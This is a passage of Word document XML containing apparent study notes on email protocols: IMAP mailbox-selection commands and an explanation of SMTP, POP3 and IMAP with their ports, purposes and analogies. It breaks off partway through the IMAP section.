        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000286A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to interact with it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000286B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a1 select INBOX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000286C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a2 select "INBOX/Sales"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000286D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a3 select "Sent"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000286E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000286F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You subfolders and folders/mailboxes are interacted with the exact same</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002870">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002871">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72">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002873">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_f250q8ytwjla" w:id="351"/>
      <w:bookmarkEnd w:id="351"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POP3, IMAP, and SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002874">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002875">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TLDR: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMTP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sending </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">emails while </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POP3 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMAP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">are for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reading </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">receiving </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">emails</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002876">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="460"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POP3 and IMAP are often seen together (so that users can interact with either) but you only need one</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002877">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="460"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POP3 is older and simple; IMAP is newer and feature-rich</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002878">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002879">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These are services commonly found on the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mail server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000287A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000287B">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usually you can re-use the same creds across all SMTP, POP3, and IMAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000287C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Because all three protocols are typically backed by the same user directory (like Active Directory, LDAP, or a local mail database).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000287D">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000287E">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For POP3 and IMAP, the plaintext and SSL usually contain the same mail</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000287F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_20k7rrv8jbyx" w:id="352"/>
      <w:bookmarkEnd w:id="352"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explaining Each</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002880">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002881">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. SMTP (Simple Mail Transfer Protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002882">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1432"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: Sending emails.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002883">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1432"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ports: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">25 (default), 465 (SSL), 587 (STARTTLS).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002884">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="303"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002885">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="303"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Your mail client (Outlook, Thunderbird, etc.) → SMTP server → recipient’s SMTP server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002886">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="303"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMTP is basically the "postal service" that takes a message from you and delivers it to the right mailbox server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002887">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1387"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analogy: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Think of it as the outgoing mail truck.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002888">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002889">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. POP3 (Post Office Protocol v3) (Older and simple)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000288A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: Retrieving email from a server to a client.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000288B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ports: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">110 (default), 995 (SSL).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000288C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000288D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you connect with POP3, it downloads the messages from the mail server to your device.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000288E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, messages are removed from the server after download (though modern clients often let you "leave a copy on server").</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000288F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Limitation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002890">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It’s simple — one mailbox, no folders.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002891">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Great for checking mail from a single device, but poor for syncing across multiple devices.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002892">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analogy:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Like going to the post office, grabbing all your mail, and taking it home.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002893">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002894">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. IMAP (Internet Message Access Protocol) (new and feature-rich)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002895">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: Retrieving and managing email on a server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002896">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
